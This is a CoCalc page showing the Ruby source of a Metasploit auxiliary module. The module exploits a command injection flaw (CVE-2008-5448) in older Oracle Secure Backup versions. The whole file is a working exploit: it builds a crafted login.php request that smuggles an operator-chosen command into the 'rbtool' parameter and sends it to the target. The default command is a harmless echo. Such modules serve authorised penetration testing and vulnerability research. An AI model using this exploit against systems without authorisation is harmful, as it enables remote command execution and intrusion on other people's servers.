CoCalc -- osb_execqr.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr.rb
¹⁹⁵⁹¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',
14
        'Description' => %q{
15
          This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
16
        },
17
        'Author' => [ 'MC' ],
18
        'License' => MSF_LICENSE,
19
        'References' => [
20
          [ 'CVE', '2008-5448' ],
21
          [ 'OSVDB', '51342' ],
22
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],
23
          [ 'ZDI', '09-003' ],
24
        ],
25
        'DisclosureDate' => '2009-01-14',
26
        'Notes' => {
27
          'Stability' => [CRASH_SAFE],
28
          'SideEffects' => [IOC_IN_LOGS],
29
          'Reliability' => []
30
        }
31
      )
32
    )
33

34
    register_options(
35
      [
36
        Opt::RPORT(443),
37
        OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),
38
        OptBool.new('SSL', [true, 'Use SSL', true]),
39
      ]
40
    )
41
  end
42

43
  def run
44
    r = Rex::Text.rand_text_english(2)
45

46
    cmd = datastore['CMD']
47

48
    uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
49

50
    req = uri + Rex::Text.uri_encode(cmd)
51

52
    print_status("Sending command: #{datastore['CMD']}...")
53

54
    send_request_raw({ 'uri' => req }, 5)
55

56
    print_status('Done.')
57
  end
58
end
59

60
Product

Resources

Company
